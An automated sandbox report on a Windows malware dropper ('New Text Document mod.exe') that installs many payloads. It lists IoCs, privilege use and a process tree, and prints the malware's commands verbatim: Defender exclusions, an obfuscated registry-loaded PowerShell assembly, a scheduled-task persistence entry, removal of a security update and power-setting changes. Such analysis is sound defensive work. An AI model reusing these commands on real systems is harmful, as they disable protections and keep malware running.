8f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 New Text Document mod.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a H3tyh96.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e H3tyh96.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4288 PING.EXE 5612 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3540 schtasks.exe 6324 schtasks.exe 7064 schtasks.exe 4068 schtasks.exe 4252 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1984 H3tyh96.exe 1984 H3tyh96.exe 1984 H3tyh96.exe 2876 cat.exe 2876 cat.exe 6472 dog.exe 6472 dog.exe 1984 H3tyh96.exe 7160 powershell.exe 1984 H3tyh96.exe 3536 powershell.exe 1084 powershell.exe 1800 powershell.exe 2476 powershell.exe 1984 H3tyh96.exe 6624 Loader.exe 6624 Loader.exe 2080 dialer.exe 2080 dialer.exe 2080 dialer.exe 2080 dialer.exe 4320 europe123.exe 4320 europe123.exe 4320 europe123.exe 1984 H3tyh96.exe 4320 europe123.exe 4320 europe123.exe 4320 europe123.exe 4320 europe123.exe 5440 k1de2zkz.exe 1984 H3tyh96.exe 1984 H3tyh96.exe 5100 pSRrNpLv0bS37RA.exe 5100 pSRrNpLv0bS37RA.exe 3564 powershell.exe 796 vbc.exe 4832 l3bevvn7.exe 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 1984 H3tyh96.exe 6872 powershell.exe 6108 vbc.exe 2160 kxfh9qhs.exe 2160 kxfh9qhs.exe 1984 H3tyh96.exe 1984 H3tyh96.exe 5892 powershell.exe 4832 l3bevvn7.exe 4832 l3bevvn7.exe 4832 l3bevvn7.exe 4832 l3bevvn7.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2944 New Text Document mod.exe Token: SeDebugPrivilege 576 wrofile1.exe Token: SeDebugPrivilege 1984 H3tyh96.exe Token: SeDebugPrivilege 2876 cat.exe Token: SeDebugPrivilege 2876 cat.exe Token: SeDebugPrivilege 6472 dog.exe Token: SeDebugPrivilege 5628 KrnlSetup.exe Token: SeDebugPrivilege 6472 dog.exe Token: SeDebugPrivilege 6108 profile1.exe Token: SeDebugPrivilege 6568 images.exe Token: SeDebugPrivilege 7160 powershell.exe Token: SeRestorePrivilege 6468 7z.exe Token: 35 6468 7z.exe Token: SeDebugPrivilege 3536 powershell.exe Token: SeSecurityPrivilege 6468 7z.exe Token: SeSecurityPrivilege 6468 7z.exe Token: SeRestorePrivilege 2336 7z.exe Token: 35 2336 7z.exe Token: SeSecurityPrivilege 2336 7z.exe Token: SeSecurityPrivilege 2336 7z.exe Token: SeRestorePrivilege 2564 7z.exe Token: 35 2564 7z.exe Token: SeSecurityPrivilege 2564 7z.exe Token: SeSecurityPrivilege 2564 7z.exe Token: SeDebugPrivilege 1084 powershell.exe Token: SeRestorePrivilege 6588 7z.exe Token: 35 6588 7z.exe Token: SeSecurityPrivilege 6588 7z.exe Token: SeSecurityPrivilege 6588 7z.exe Token: SeRestorePrivilege 5156 7z.exe Token: 35 5156 7z.exe Token: SeSecurityPrivilege 5156 7z.exe Token: SeSecurityPrivilege 5156 7z.exe Token: SeRestorePrivilege 5604 7z.exe Token: 35 5604 7z.exe Token: SeSecurityPrivilege 5604 7z.exe Token: SeSecurityPrivilege 5604 7z.exe Token: SeRestorePrivilege 6040 7z.exe Token: 35 6040 7z.exe Token: SeSecurityPrivilege 6040 7z.exe Token: SeSecurityPrivilege 6040 7z.exe Token: SeRestorePrivilege 5472 7z.exe Token: 35 5472 7z.exe Token: SeDebugPrivilege 1800 powershell.exe Token: SeSecurityPrivilege 5472 7z.exe Token: SeSecurityPrivilege 5472 7z.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 5100 pSRrNpLv0bS37RA.exe Token: SeDebugPrivilege 324 Lu4421.exe Token: SeDebugPrivilege 3564 powershell.exe Token: SeDebugPrivilege 796 vbc.exe Token: SeDebugPrivilege 4976 tasklist.exe Token: SeDebugPrivilege 5168 tasklist.exe Token: SeDebugPrivilege 6872 powershell.exe Token: SeDebugPrivilege 6108 vbc.exe Token: SeDebugPrivilege 5892 powershell.exe Token: SeDebugPrivilege 4832 l3bevvn7.exe Token: SeShutdownPrivilege 2804 powercfg.exe Token: SeShutdownPrivilege 2248 powercfg.exe Token: SeShutdownPrivilege 3856 powercfg.exe Token: SeShutdownPrivilege 1412 powercfg.exe Token: SeDebugPrivilege 3388 powershell.exe Token: SeDebugPrivilege 3384 xtoxzfwgupjk.exe Token: SeShutdownPrivilege 1768 powercfg.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1984 H3tyh96.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2944 wrote to memory of 576 2944 New Text Document mod.exe 31 PID 2944 wrote to memory of 576 2944 New Text Document mod.exe 31 PID 2944 wrote to memory of 576 2944 New Text Document mod.exe 31 PID 2944 wrote to memory of 576 2944 New Text Document mod.exe 31 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 2944 wrote to memory of 1984 2944 New Text Document mod.exe 34 PID 2944 wrote to memory of 1984 2944 New Text Document mod.exe 34 PID 2944 wrote to memory of 1984 2944 New Text Document mod.exe 34 PID 2944 wrote to memory of 1984 2944 New Text Document mod.exe 34 PID 2944 wrote to memory of 2876 2944 New Text Document mod.exe 35 PID 2944 wrote to memory of 2876 2944 New Text Document mod.exe 35 PID 2944 wrote to memory of 2876 2944 New Text Document mod.exe 35 PID 2944 wrote to memory of 3896 2944 New Text Document mod.exe 36 PID 2944 wrote to memory of 3896 2944 New Text Document mod.exe 36 PID 2944 wrote to memory of 3896 2944 New Text Document mod.exe 36 PID 2944 wrote to memory of 6180 2944 New Text Document mod.exe 37 PID 2944 wrote to memory of 6180 2944 New Text Document mod.exe 37 PID 2944 wrote to memory of 6180 2944 New Text Document mod.exe 37 PID 2876 wrote to memory of 6404 2876 cat.exe 39 PID 2876 wrote to memory of 6404 2876 cat.exe 39 PID 2876 wrote to memory of 6404 2876 cat.exe 39 PID 2944 wrote to memory of 6472 2944 New Text Document mod.exe 40 PID 2944 wrote to memory of 6472 2944 New Text Document mod.exe 40 PID 2944 wrote to memory of 6472 2944 New Text Document mod.exe 40 PID 2944 wrote to memory of 6472 2944 New Text Document mod.exe 40 PID 2944 wrote to memory of 5628 2944 New Text Document mod.exe 41 PID 2944 wrote to memory of 5628 2944 New Text Document mod.exe 41 PID 2944 wrote to memory of 5628 2944 New Text Document mod.exe 41 PID 2944 wrote to memory of 5712 2944 New Text Document mod.exe 42 PID 2944 wrote to memory of 5712 2944 New Text Document mod.exe 42 PID 2944 wrote to memory of 5712 2944 New Text Document mod.exe 42 PID 5712 wrote to memory of 5852 5712 Client-built.exe 43 PID 5712 wrote to memory of 5852 5712 Client-built.exe 43 PID 5712 wrote to memory of 5852 5712 Client-built.exe 43 PID 6472 wrote to memory of 5960 6472 dog.exe 44 PID 6472 wrote to memory of 5960 6472 dog.exe 44 PID 6472 wrote to memory of 5960 6472 dog.exe 44 PID 6472 wrote to memory of 5960 6472 dog.exe 44 PID 2944 wrote to memory of 6048 2944 New Text Document mod.exe 45 PID 2944 wrote to memory of 6048 2944 New Text Document mod.exe 45 PID 2944 wrote to memory of 6048 2944 New Text Document mod.exe 45 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4048 attrib.exe 4008 attrib.exe 5888 attrib.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6aed2439-4064-4a71-ab7f-c1494fa4f2bc}2⤵PID:5912
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:472 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:600
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1748
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:276
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵PID:6332
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:756
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:820
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1160
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵PID:844
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵PID:7092
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6D67D78B-9591-4743-9130-47730C2CA09C} S-1-5-18:NT AUTHORITY\System:Service:3⤵PID:3512
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+'T'+''+'W'+'AR'+'E'+'').GetValue('d'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:4064
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {AD9BA19B-3C1B-42F9-ABF1-332EF62032D4} S-1-5-21-2039016743-699959520-214465309-1000:PIDEURYY\Admin:Interactive:[1]3⤵
- Loads dropped DLL
PID:3700 -
C:\ProgramData\ntoskrnl.exeC:\ProgramData\ntoskrnl.exe4⤵
- Executes dropped EXE
PID:4128
-
-
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exeC:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4152 -
C:\Windows\explorer.exeexplorer.exe5⤵PID:4700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe5⤵
- Drops file in System32 directory
- System Network Configuration Discovery: Internet Connection Discovery
PID:4904 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.10.16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5612
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:972
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:268
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:352
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1068
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1112
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1528
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1324
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1728
-
-
C:\ProgramData\efibnbqijiyi\xtoxzfwgupjk.exeC:\ProgramData\efibnbqijiyi\xtoxzfwgupjk.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3384 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:6192
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:5832
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:2312
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:5036
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:5088
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2504
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:5964
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵PID:5376
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"2⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe"C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exeC:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe4⤵
- Executes dropped EXE
PID:1296
-
-
C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exeC:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe4⤵
- Executes dropped EXE
PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\H3tyh96.exe"C:\Users\Admin\AppData\Local\Temp\a\H3tyh96.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\a\cat.exe"C:\Users\Admin\AppData\Local\Temp\a\cat.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2876 -s 6164⤵
- Loads dropped DLL
PID:6404
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"3⤵
- Executes dropped EXE
PID:3896
-
-
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"3⤵
- Executes dropped EXE
PID:6180
-
-
C:\Users\Admin\AppData\Local\Temp\a\dog.exe"C:\Users\Admin\AppData\Local\Temp\a\dog.exe"3⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6472 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 6164⤵
- Loads dropped DLL
- Program crash
PID:5960
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe"C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:5628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4252
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5628 -s 20724⤵PID:4800
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\a\Client-built.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
